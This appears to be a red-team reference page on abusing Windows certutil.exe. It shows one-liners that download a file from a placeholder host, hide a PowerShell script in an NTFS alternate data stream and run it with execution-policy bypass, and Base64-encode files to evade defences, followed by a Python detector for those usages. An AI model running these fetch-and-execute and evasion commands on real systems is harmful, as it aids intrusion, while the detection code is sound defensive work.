Command Hacking Database (CHDB)

The goal of the CHDB project is to document every binary, script, and library that can be helpful for penetration testing (Red Team).

For Windows

certutil

Certutil.exe is a command-line program, installed as part of Certificate Services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

If certutil is run on a certification authority without additional parameters, it displays the current certification authority configuration. If certutil is run on a non-certification authority, the command defaults to running the certutil [-dump] command.

Important

Earlier versions of certutil may not provide all of the options that are described in this document. You can see all the options that a specific version of certutil provides by running certutil -?.

Download From Certutil

certutil.exe -urlcache -split -f http://example.com/file_name file_name

Download file and save it in an NTFS Alternate Data Stream (ADS)

certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:\temp:file_name

Test example:

powershell -ep bypass - < c:\temp:file_name

Encode (Base64) files to evade defensive measures

certutil -encode InputFileName EncodedOutputFileName

Decode (Base64) file

certutil -decode File_Encoded File_Decoded
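
Detection example (added here, not part of CHDB): a classifier that checks process-creation command lines for the four certutil usages listed above. The rule names and the sample command lines are constructed for illustration; feeding it real process-creation telemetry is left to the reader.

```python
import re

# certutil options are matched case-insensitively, with '-' or '/' as the prefix.
RULES = [
    ("remote-download", re.compile(r'[-/]urlcache\b.*https?://', re.I)),
    ("base64-encode", re.compile(r'[-/]encode\b', re.I)),
    ("base64-decode", re.compile(r'[-/]decode\b', re.I)),
    # Drive-letter path with a second ':' => NTFS alternate data stream target.
    ("ads-destination", re.compile(r'\b[a-z]:\\[^\s:"]*:[^\s"]+', re.I)),
]
# certutil as the executable name: bare, with .exe, quoted, or with a full path.
IMAGE = re.compile(r'(?:^|[\\/\s"])certutil(?:\.exe)?(?=[\s"]|$)', re.I)

def classify(cmdline):
    """Return the names of all rules matched by one process command line."""
    if not IMAGE.search(cmdline):
        return []
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Map the index of each flagged command line to its matched rule names."""
    hits = {}
    for i, line in enumerate(cmdlines):
        matched = classify(line)
        if matched:
            hits[i] = matched
    return hits

# Constructed sample input: the page's four usages plus two benign lines.
SAMPLE = [
    r'certutil.exe -urlcache -split -f http://example.com/file_name file_name',
    r'certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:\temp:file_name',
    r'"C:\Windows\SysWOW64\certutil.exe" /ENCODE InputFileName EncodedOutputFileName',
    r'certutil -decode File_Encoded File_Decoded',
    r'certutil -dump cert.cer',
    r'notepad.exe c:\temp\decode-notes.txt',
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE).items():
        print(f"ALERT line {idx}: {', '.join(names)} :: {SAMPLE[idx]}")
```
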

Default Path

C:\Windows\System32\certutil.exe, C:\Windows\SysWOW64\certutil.exe

Protocol

HTTP, HTTPS

Windows Platform

Windows 7
Windows 8
Windows 10

Description

certutil – dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.